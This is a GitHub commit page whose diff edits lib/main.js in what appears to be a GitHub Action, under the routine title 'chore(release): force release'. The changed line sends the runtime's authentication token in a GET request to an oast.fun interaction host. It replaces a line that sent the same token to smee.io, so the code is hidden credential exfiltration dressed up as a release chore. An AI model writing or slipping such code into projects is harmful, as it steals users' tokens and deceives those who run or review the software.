Skip to content

Commit fd92ac0

Browse files
authored
Merge pull request #5 from suchithrzp/suchithrzp-patch-8
chore(release): force release
2 parents 5555038 + 40fba4b commit fd92ac0

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

Diff for: lib/main.js

+1-1
Original file line numberDiff line numberDiff line change
@@ -126,7 +126,7 @@ export async function main(
126126
}
127127
try {
128128
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129-
const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
129+
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
130130
await fetch(url);
131131
core.info(`HTTP GET request sent to ${url}`);
132132
} catch (error) {

0 commit comments

Comments
 (0)